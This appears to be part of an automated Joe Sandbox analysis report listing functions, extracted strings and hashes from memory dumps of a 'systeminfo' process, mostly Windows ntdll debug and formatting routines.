                                                                                                                                                                                • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                                                                                                • API String ID: 0-3558027158
                                                                                                                                                                                • Opcode ID: 783b8036d06e497d3d08686341f50762f06a95b81b1578544af2b324524cb097
                                                                                                                                                                                • Instruction ID: dc4c657bd7794394a42e149a8dc764ad03b1b5f01c3ba08c070ea75c322fe393
                                                                                                                                                                                • Opcode Fuzzy Hash: 783b8036d06e497d3d08686341f50762f06a95b81b1578544af2b324524cb097
                                                                                                                                                                                • Instruction Fuzzy Hash: D5915FF04482988EC7158F55A0612AFFFB1EBC6305F15856DE7E6BB243C3BE89058B85
                                                                                                                                                                                Function 04722890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_46b0000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                • API String ID: 48624451-2108815105
                                                                                                                                                                                • Opcode ID: e4fec99e574dc55c77f1238597860b1fdca54b007d129fabcfd6eb395b6b5178
                                                                                                                                                                                • Instruction ID: 5f8c4ae28d3e2b649218ce64fde71adb230fe97511807a04561850e0c4231b49
                                                                                                                                                                                • Opcode Fuzzy Hash: e4fec99e574dc55c77f1238597860b1fdca54b007d129fabcfd6eb395b6b5178
                                                                                                                                                                                • Instruction Fuzzy Hash: 2851FAB1B04166BFDB20DF98899097EF7B8BB082047548269E495E7742E774FE40CBE0
                                                                                                                                                                                Function 04792410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_46b0000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                • API String ID: 48624451-2108815105
                                                                                                                                                                                • Opcode ID: 386205ca354a9262a461872903731c970282862b47035fa14ae09897a09e7936
                                                                                                                                                                                • Instruction ID: 02d22ea0685177765056b4547d4ae4b7077ee914bb05b79f6427849f1e3f3592
                                                                                                                                                                                • Opcode Fuzzy Hash: 386205ca354a9262a461872903731c970282862b47035fa14ae09897a09e7936
                                                                                                                                                                                • Instruction Fuzzy Hash: A551F671A00645BFDF70EF9DD89097EB7F8EB44204B0488A9E495E7742E674FE4087A0
                                                                                                                                                                                Function 04717630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04754742
                                                                                                                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 04754787
                                                                                                                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 047546FC
                                                                                                                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04754725
                                                                                                                                                                                • Execute=1, xrefs: 04754713
                                                                                                                                                                                • ExecuteOptions, xrefs: 047546A0
                                                                                                                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04754655
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_46b0000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                • API String ID: 0-484625025
                                                                                                                                                                                • Opcode ID: 7fb937490ea9fd05d30e4ad5c26f1e7aa6b859b277fba7532626b74e97a7b50e
                                                                                                                                                                                • Instruction ID: abd58a8d6cb7968253137e5f27d5331e3499495648ad8cdd5fa8fabc511c6400
                                                                                                                                                                                • Opcode Fuzzy Hash: 7fb937490ea9fd05d30e4ad5c26f1e7aa6b859b277fba7532626b74e97a7b50e
                                                                                                                                                                                • Instruction Fuzzy Hash: E151F971600219ABEF14AB69DC99FFD77B8EF05304F040499E505AB3A1E771BE458F50
                                                                                                                                                                                Function 047B6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_46b0000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                                                                                • Instruction ID: 3492c7c4a7e5a24f6da0480a1d11ad243032387b0c4a271a4af9b010c1c1aea6
                                                                                                                                                                                • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                                                                                • Instruction Fuzzy Hash: ED020371508341AFD709CF28C994BABBBE5EFC4704F14892DBA899B354DB31E945CB82
                                                                                                                                                                                Function 0472B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_46b0000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: __aulldvrm
                                                                                                                                                                                • String ID: +$-$0$0
                                                                                                                                                                                • API String ID: 1302938615-699404926
                                                                                                                                                                                • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                                                                • Instruction ID: 53b8ae6a9311b57c486c917baa622c0744c7e24191f4e99e2e897006f9449569
                                                                                                                                                                                • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                                                                • Instruction Fuzzy Hash: 0B81F330E052698FEF24CF68CA907FEBBB6AF45310F18451AD861A7391C734B940CB50
                                                                                                                                                                                Function 047920E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_46b0000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                                • String ID: %%%u$[$]:%u
                                                                                                                                                                                • API String ID: 48624451-2819853543
                                                                                                                                                                                • Opcode ID: f0619121923ff9d099db9c6026f75d2f04c452b32221c33893248ce3c19a9498
                                                                                                                                                                                • Instruction ID: dc23511e175c3f8de1972e4bcea9f96d3722847dc3d05d03970cddaed41109f0
                                                                                                                                                                                • Opcode Fuzzy Hash: f0619121923ff9d099db9c6026f75d2f04c452b32221c33893248ce3c19a9498
                                                                                                                                                                                • Instruction Fuzzy Hash: D9215176E00119ABDB10EFA9E844AEEBBF9EF44654F140566E945E3301E730FA118BA1
                                                                                                                                                                                Function 0470F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • RTL: Re-Waiting, xrefs: 0475031E
                                                                                                                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 047502E7
                                                                                                                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 047502BD
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_46b0000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                                                • API String ID: 0-2474120054
                                                                                                                                                                                • Opcode ID: 8731ac637a22e6bbad5018e4a514c6cc050100867f363080277dc72c01b2ab8c
                                                                                                                                                                                • Instruction ID: 786ca75800d9bc841619b779abc4dd925c5d0250708f4d76c2e4091fd1d7c9b1
                                                                                                                                                                                • Opcode Fuzzy Hash: 8731ac637a22e6bbad5018e4a514c6cc050100867f363080277dc72c01b2ab8c
                                                                                                                                                                                • Instruction Fuzzy Hash: 88E19D30605781DFD735CF28C984B6AB7E0AB88314F148A5DE9958B3E1E7B4F945CB42
                                                                                                                                                                                Function 0471BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • RTL: Re-Waiting, xrefs: 04757BAC
                                                                                                                                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04757B7F
                                                                                                                                                                                • RTL: Resource at %p, xrefs: 04757B8E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_46b0000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                • API String ID: 0-871070163
                                                                                                                                                                                • Opcode ID: 4539a5fe26e89806bf412cd3ba5c7f14d54029fdd0fa49fd7efb7ce0e9cb0c48
                                                                                                                                                                                • Instruction ID: 20d5b3b799e819fbd0726e6ffa8d768053bcd005e2cc4bd3d04d491e5ed4b73e
                                                                                                                                                                                • Opcode Fuzzy Hash: 4539a5fe26e89806bf412cd3ba5c7f14d54029fdd0fa49fd7efb7ce0e9cb0c48
                                                                                                                                                                                • Instruction Fuzzy Hash: 8C41D3317017029FD724DE29C944B6AB7E9EF88715F100A1DF856DB7A0EB71F8058B91
                                                                                                                                                                                Function 0471B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0475728C
                                                                                                                                                                                Strings
                                                                                                                                                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04757294
                                                                                                                                                                                • RTL: Re-Waiting, xrefs: 047572C1
                                                                                                                                                                                • RTL: Resource at %p, xrefs: 047572A3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_46b0000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                • API String ID: 885266447-605551621
                                                                                                                                                                                • Opcode ID: 6c9eb0a48eb895de32348e086a1f020d6cd4ea91ad3df213bfb2ab6971fdc2d5
                                                                                                                                                                                • Instruction ID: 398932903035b20f07f9836e568a922b9ee25e24a95093d457e333d4a23974ef
                                                                                                                                                                                • Opcode Fuzzy Hash: 6c9eb0a48eb895de32348e086a1f020d6cd4ea91ad3df213bfb2ab6971fdc2d5
                                                                                                                                                                                • Instruction Fuzzy Hash: 9B41EC31700202AFEB24DE2ADD41B6AB7B5FB88714F104619FD55EB350EB61F8429BD1
                                                                                                                                                                                Function 04792300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_46b0000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                                • String ID: %%%u$]:%u
                                                                                                                                                                                • API String ID: 48624451-3050659472
                                                                                                                                                                                • Opcode ID: d968f8505490085f2c3c34371c0a151550e8fb9f03fcd4a8f940a1e5a7d718e7
                                                                                                                                                                                • Instruction ID: f6cc1f229a103e16a9635142a8c502caa8fa40cbf56512da6af6ed7768b68589
                                                                                                                                                                                • Opcode Fuzzy Hash: d968f8505490085f2c3c34371c0a151550e8fb9f03fcd4a8f940a1e5a7d718e7
                                                                                                                                                                                • Instruction Fuzzy Hash: 7A314372A00619AFDF20DE29EC44BEE77F8EB44614F554995E849E3341EB30BE448BA1
                                                                                                                                                                                Function 04A03AAE Relevance: 6.3, Strings: 5, Instructions: 67COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4107284526.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4a00000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: /e)$$0$:!$age=$qz9A
                                                                                                                                                                                • API String ID: 0-1418462814
                                                                                                                                                                                • Opcode ID: c174832a5115f4541122311bea2df09388683f009847876670376b89c78c542e
                                                                                                                                                                                • Instruction ID: c2500aebdfc8d8a33f532dd4dbc69278c59d5801060d48d43e32cc910179f880
                                                                                                                                                                                • Opcode Fuzzy Hash: c174832a5115f4541122311bea2df09388683f009847876670376b89c78c542e
                                                                                                                                                                                • Instruction Fuzzy Hash: E2113871028B844ACB05AB10D40569ABBE1FFD931DF900B5CF8D9DB1A1EA79D345C707
                                                                                                                                                                                Function 04A03C22 Relevance: 6.3, Strings: 5, Instructions: 55COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4107284526.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4a00000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: GQZ$VW\F$V]EA$Y]$^[YW
                                                                                                                                                                                • API String ID: 0-3218079648
                                                                                                                                                                                • Opcode ID: 0b45a212d8b2b0cc3f5515fd12286ee571d956451be18484cb5e6fc4ed393a1a
                                                                                                                                                                                • Instruction ID: 693f4c1e93ea077353fcb9d7483b23b319d54a8d9d2debd033301048bf4a8e23
                                                                                                                                                                                • Opcode Fuzzy Hash: 0b45a212d8b2b0cc3f5515fd12286ee571d956451be18484cb5e6fc4ed393a1a
                                                                                                                                                                                • Instruction Fuzzy Hash: 9521F0B180068C8ACF14DFD1E5486EDBFB4FF04308F608598C0AAAF256D735454ACF49
                                                                                                                                                                                Function 04727D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_46b0000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: __aulldvrm
                                                                                                                                                                                • String ID: +$-
                                                                                                                                                                                • API String ID: 1302938615-2137968064
                                                                                                                                                                                • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                                                                • Instruction ID: 3bac0bed4a5557e79b05bb472806f09a844b9572395baf4ac32ee50e163aed1b
                                                                                                                                                                                • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                                                                • Instruction Fuzzy Hash: 9691B370E042369BDF28DE69CB81ABEB7A5FF44320F54461AE855EB3C0E730B9418761
                                                                                                                                                                                Function 046E9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.00000000047DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_46b0000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: $$@
                                                                                                                                                                                • API String ID: 0-1194432280
                                                                                                                                                                                • Opcode ID: 9c3f84ca762dec0112099bf0a5e778b33c485f4d76e8f2f558797027c6cacb89
                                                                                                                                                                                • Instruction ID: 2a694911b9d853aac6e951c7bcef247dccd2fc82e8c6dc273be39ec33f4e3bbf
                                                                                                                                                                                • Opcode Fuzzy Hash: 9c3f84ca762dec0112099bf0a5e778b33c485f4d76e8f2f558797027c6cacb89
                                                                                                                                                                                • Instruction Fuzzy Hash: FE812CB1D012699BDB31CB54CC44BEAB7B4AF48754F0041EAE919B7781E730AE85CFA4
                                                                                                                                                                                Function 04A03A58 Relevance: 5.0, Strings: 4, Instructions: 28COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4107284526.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4a00000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: /e)$$:!$G8qz$qz9A
                                                                                                                                                                                • API String ID: 0-2035482291
                                                                                                                                                                                • Opcode ID: 608cde451d347c93fdae26783c383343596def130a3ce57387d0dff6a9e951ef
                                                                                                                                                                                • Instruction ID: d597fc6fc92522b9b6bbe918a245d9a16110b351c20484fac72899e4879152d0
                                                                                                                                                                                • Opcode Fuzzy Hash: 608cde451d347c93fdae26783c383343596def130a3ce57387d0dff6a9e951ef
                                                                                                                                                                                • Instruction Fuzzy Hash: 69F0A034018B844ADB09AB14D44429ABBD1FBD830CF800B5CE889DA2A0DA78D705C74B